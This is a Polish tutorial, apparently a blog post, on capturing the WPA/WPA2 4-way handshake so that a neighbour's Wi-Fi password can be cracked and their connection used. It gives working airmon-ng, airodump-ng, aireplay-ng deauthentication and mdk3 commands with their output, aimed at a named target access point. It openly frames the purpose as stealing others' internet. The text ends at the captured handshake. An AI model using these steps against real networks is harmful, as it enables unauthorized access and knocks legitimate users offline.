WPA2/PSK TKIP jest już silniejszym zabezpieczeniem niż WEP i WPA, dostanie się do zabepieczonej sieci zajmie nam dużo więcej czasu niż w przypadku WEP.
Zobaczysz tutaj, jak łatwo odzyskać hasło z sieci bezprzewodowej chronionej przez WPA/WPA2.
Pierwsze co, aby móc zaatakować klucz musisz przechwycić coś co nazywa się 4-way handshake, czyli 4-stopniowe podawanie ręki. W nim zapisany jest klucz dostępu do sieci, zaszyfrowany oczywiście i to właśnie ten klucz musimy złamać by podkradać komuś Internety.
Przełącz kartę sieciową w tryb monitor, zrób to używając airmon-ng.
airmon-ng start wlan0 Found 4 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 1150 avahi-daemon 1152 NetworkManager 1154 avahi-daemon 1324 wpa_supplicant Interface Chipset Driver wlan0 Atheros ath9k - [phy0] (monitor mode enabled on mon0) |
Żeby
przechwycić 4-way handshake musisz mieć dużo czasu jak i
szczęścia, przekazywane jest ono tylko wtedy gdy nawiązywane jest
połączenie klienta z AP od zera i gdy zostanie do końca poprawnie
nawiązane.
airodump-ng musisz ustawić tak by przechwytywało tylko pakiety kierowane do określonego AP, dobrze też mierzyć tylko w kanał na którym nadaje serwer (filtrowanie pakietów to podstawa szybkich ataków).
U mnie atakujemy sieć NASA o BSSID: 00:04:ED:A3:80:11, działającej na kanale 1, dane zapisuję do pliku NASA i czekam na handshake.
airodump-ng mon0 --bssid 00:04:ED:A3:80:11 -c 1 -w NASA [ CH 1 ][ Elapsed: 8 s ][ 2011-01-12 17:08 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E 00:04:ED:A3:80:11 -56 93 77 0 0 1 54 WPA2 CCMP PSK N BSSID STATION PWR Rate Lost Packets Probes 00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 2 NASA |
Jak mogłeś zauważyć nie użyłem opcji –ivs, bo potrzebujemy pełnych pakietów, a nie części jak to jest przy atakowaniu WEPa.
Podczas przechwytywania pakietów okno wygląda podobnie do tego.
[CH 1 ][ Elapsed: 3 s ][ 2011-01-12 17:24 ] BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:04:ED:A3:80:11 -53 40 40 12 9 1 54 WPA2 CCMP PSK NASA BSSID STATION PWR Rate Lost Packets Probes 00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 5 NASA 00:04:ED:A3:80:11 00:4F:78:00:A2:A5 -40 24 - 1 28 25 |
Aby spowodować by klienci atakowanej sieci rozłączyli się z nią i ponownie połączyli:
aireplay-ng mon0 --deauth 0 -a 00:04:ED:A3:80:11 -c 48:5D:60:34:A8:59 12:37:23 Waiting for beacon frame (BSSID: 00:04:ED:A3:80:11) on channel 14 12:37:26 mon0 is on channel 14, but the AP uses channel 1 |
-a podajesz adres MAC atakowanego routera
-c adres MAC karty sieciowej, którą chcesz odciąć od sieci, aby mieć pewność, że ten komputer się za moment połączy ponownie podaj ten adres, przy którym jest największy ruch sieciowy
Po tym poleceniu odciąłem właśnie sam siebie z sieci.
Dane odczytasz z tabel w airodump-ng :inft:
Aby wyrzucić wszystkich z danej sieci można też użyć programu mdk3.
mdk3 mon0 d -t 00:04:ED:A3:80:11 Disconnecting between: 01:00:5E:00:00:16 and: 00:04:ED:A3:80:11 Disconnecting between: 33:33:00:00:00:0C and: 00:04:ED:A3:80:11 Disconnecting between: 01:00:5E:7F:FF:FA and: 00:04:ED:A3:80:11 .... Disconnecting between: 48:5D:60:34:A8:59 and: 00:04:ED:A3:80:11 |
d oznacza odłączenie wszystkich kart sieciowych z sieci, której MAC adres podany po parametrze -t
z/w ide mamie Internet zrobić.
A tak wygląda okno ekranu gdy handshake jest już przechwycony:
[ CH 1 ][ Elapsed: 12 s ][ 2011-01-12 17:24 ]<strong>[ WPA handshake: 00:04:ED:A3:80:11 ]</strong> BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID 00:04:ED:A3:80:11 -53 40 130 27 9 1 54 WPA2 CCMP PSK NASA BSSID STATION PWR Rate Lost Packets Probes 00:04:ED:A3:80:11 48:5D:60:34:A8:59 0 0 -54 0 25 NASA 00:04:ED:A3:80:11 00:4F:78:00:A2:A5 -40 24 - 1 28 25 |
No właśnie tak wygląda okno gdy handshake jest złapany przez skaner airodump-ng. Głównym problemem tego ataku jest złapanie handshake. Nie da się go złapać bez aktywnego użytkownika w sieci.